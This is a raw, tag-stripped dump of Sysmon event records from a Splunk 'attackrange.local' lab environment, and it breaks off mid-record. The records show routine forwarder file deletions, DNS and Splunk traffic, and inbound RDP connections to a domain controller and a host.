AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54256-false51.124.78.146-443https 354300x80000000000000001057053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.459{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49350- 354300x80000000000000001057052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:02.198{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54255-false40.126.31.6-443https 23542300x80000000000000001057051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:04.825{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94891D6023E2754DDD4B08254832C011,SHA256=01540DADD132E2089B43272B36377E7F14D6698A448BC489D1E4116C082DA80E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981526Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:04.757{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85DD9A7CE41D969367FA409A07341E8F,SHA256=8DDA9B1B3BF5F93B6A4F8D801C0A269E0AD5A90ABC44AEB15F6A6C0FBAE19391,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981525Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:00.729{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com24954-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981529Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:05.992{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0FF858332D55A3FE0C3561B76694028,SHA256=D9B453DE9C916A3F3CC3CD77CA1C9DE33B6AE2598DEDA8D41FB7CFC1AA6C64CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:05.825{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=632D393D6F17C150C4FB61B444819C91,SHA256=F318D8372800FE9AD20EF740A60D622B04CDE6473DAB173FA17750DD30205B1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981528Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:05.773{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AA097E9CA57E5A2F7AA852C8BF224B0,SHA256=D72A7FFF8013911EC063B8CEAFCA83B10BD76E15CE4A7CD039FF7D7627A3BCA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981527Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:01.845{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55772-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:06.841{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E884672A18726CADB736AAC3E5D2917F,SHA256=3C44DF3B538EAC54461A1F185B910B436B29574D4464EAD1FE0B6F9C1321CA8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981530Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:02.723{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59555-false10.0.1.12-8000- 23542300x80000000000000001057057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:06.700{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58668E71A9A30A1FF39588E9C4EC3F09,SHA256=CD14682BECDFF3F59575FBDA1C65F15775E76A1E3B2CCE8D147673EC93C7A962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:07.841{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FB68A9D0AC3F7D905318BBA6F7EFA5,SHA256=CCC38229312E65687611614FC728740CBD6DF79BDEB524C36BBA23270530B7A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981535Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:07.742{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981534Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:07.742{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981533Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:07.742{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000981532Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:03.540{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64115-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981531Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:07.226{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD4460DB59BE07580EF648F741CB8F8E,SHA256=90A47B547A7EC16E95CC929EDCC14C75C3CF2812C2C388CC21F2B1671EA73CBE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:05.321{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com31967-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:04.894{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55518- 23542300x80000000000000001057062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:08.841{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71FED9E41C20186A35153AFF64461E61,SHA256=F268A170F15F4EA31961755A9F6CAD6DDD3DE77C2419DFD0590CA77E1BBAD019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981536Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:08.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4FE8784232D226390E3572BD5D9B23,SHA256=9EB57377580096D6383D8A62C46E5348F776928C65CE446F6F7D96CE284F1A01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:09.857{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35899662A75CDDD77099481EDA7E60DF,SHA256=31D30B99285B1CEC99FD1978214B0E2C52CC6DE6B613A5633FCC2DE38E72030F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981537Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:09.632{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AA70CD5A286607E733F689C58235053,SHA256=E6B6D621EAD805DF4562B4CD9169EA33923AB22820B76F03A2B38BACD34AC225,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001057063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:09.763{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0x911f8da7) 23542300x8000000000000000981538Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:10.663{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849FBBEAB7E69ECEC00015C2090FD1CE,SHA256=F1EF7FAC632128F401AD04141493CEA2B28DCC48D4CEA0CFC511E958703CE5E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:10.857{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87362AC0F0C9499D69A76776BBD3E89A,SHA256=E3E2B4533F60563B4190E85D6C82DE65CD16420FE0D29D06547D14C574F3AE46,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:09.019{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54258-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:11.857{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D935D664C7E5EE0AA97D41F85F32A57,SHA256=6424B3155615C02070E99F0670E4BC13D02F14E57032E95ABC851BD0776F74D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981540Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:11.835{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4FE73A3A180824BF4F4AB69B6890BB,SHA256=C92E13A553B7E468BA65059E9CFE2283975857E2D36571340E2476641EE5577C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981539Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:08.738{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59556-false10.0.1.12-8000- 23542300x80000000000000001057068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:12.857{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6BD0EADF979B91987172961CC040841,SHA256=A3C9FBD7B77F5B6BB4D53F1128ACDE348A14B0E6F7AA9A78B401A12ED01E2264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981541Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:12.851{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE47BF76A2DB4DED8BCD1DA1FAA717C9,SHA256=BA33748B76CA2DA159AC9EEDD888AD528992F0D002480A7A9EC21C9ED270A411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:13.857{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B927EF2F407E7BB7E78E3A75CFFE91,SHA256=D185B37303F9A0DC09A3AF35FA513A0749EF72DDAD9E5DF1800C37FEFBE50DA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981543Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:13.976{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981542Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:13.851{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF4169FBFAD4D16DA53B1739B6F1CA49,SHA256=BD2CD34C3A89494A6135C5CCD8F51C202DE43D9BB354DF1C04E60D824300CEB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981544Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:14.866{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5782567148C14C0E626D9EB1F97A1C44,SHA256=9DFF0AC03C59BB1B684EDF903B0E8743AF31148D10DEE4BE3F27C26146FD2DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:14.857{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F22BAA3A9132F4DB265BF9A8C93B065,SHA256=293536E6F9BF8DCBBA98119749CC583F328A2C1BDF1959C186B9A25A66C95EF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:15.873{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=689DA4E5A68BBA099F3283431BDBF3D4,SHA256=40D112FCA37AC6376D2EA4658EB0026077A3E4119D58BFE14383412C905D7AB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981545Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:12.598{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59557-false10.0.1.12-8089- 23542300x80000000000000001057073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:15.763{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=892B1F435FC6AD803EB3CF23BCECDDF8,SHA256=59DE3D7DC772EC98A7A0D23055F5D272114FA4FEBF2C1C00411B9A6E35D305BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:15.763{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C3B165FFB1DA122D40ACD16107BDA27,SHA256=5915C4FAC9FF659684D846846EA8F58B9985338A6DA5B9337F7B3B9FFD2C03E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:15.576{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:16.888{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B252AB3DFEADE83F5E48382C9216C871,SHA256=4A1EE584A36BE9884FA55548198692575AB67FDE972F2F838245EA1A4417996D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981546Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:16.085{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD14B7C9045B503018C0CE202428FD5,SHA256=40941344CD3DFC6A35BB4198FD2CA5B43A2A5451DE83F2ADADE3E633AE2A7E11,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:14.588{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-52100-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:14.144{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54259-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:17.888{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F037E76BDE0BB9193A75225D385031BD,SHA256=67DE65A5771A2E237A2CEF218621D0B62EA4A1C7D023F35B5139C68EFFBA7E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981547Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:17.320{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38652F3DA1E52137D9742FCDEA6324B7,SHA256=8C885AC38366EFB86DE264796374014EFEDA44A4B28AF1AB82F96D80AA8DA63C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:15.504{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54260-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001057080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:18.890{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EABE2FEDF0C36BE403FF5D5D9B6D4243,SHA256=530702469216E80BAA08B8C97871B1D6397364C143931FCBCF3B5CF441056DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981549Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:18.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9164A85C7B0F1A2E527CA39091C9B9F2,SHA256=4DDD6218B9979A9CEA7208353C367E20EF6C68ED4AFB4213F19DDD63DF1E5B13,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981548Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 